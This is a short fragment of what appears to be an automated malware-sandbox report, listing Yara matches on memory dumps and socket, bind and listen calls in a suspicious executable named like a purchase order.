Source: Yara match File source: 00000001.00000002.1973374982.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2480573811.0000000002C20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2479760210.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1974135087.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480693049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_007A6283
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_007A6747
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs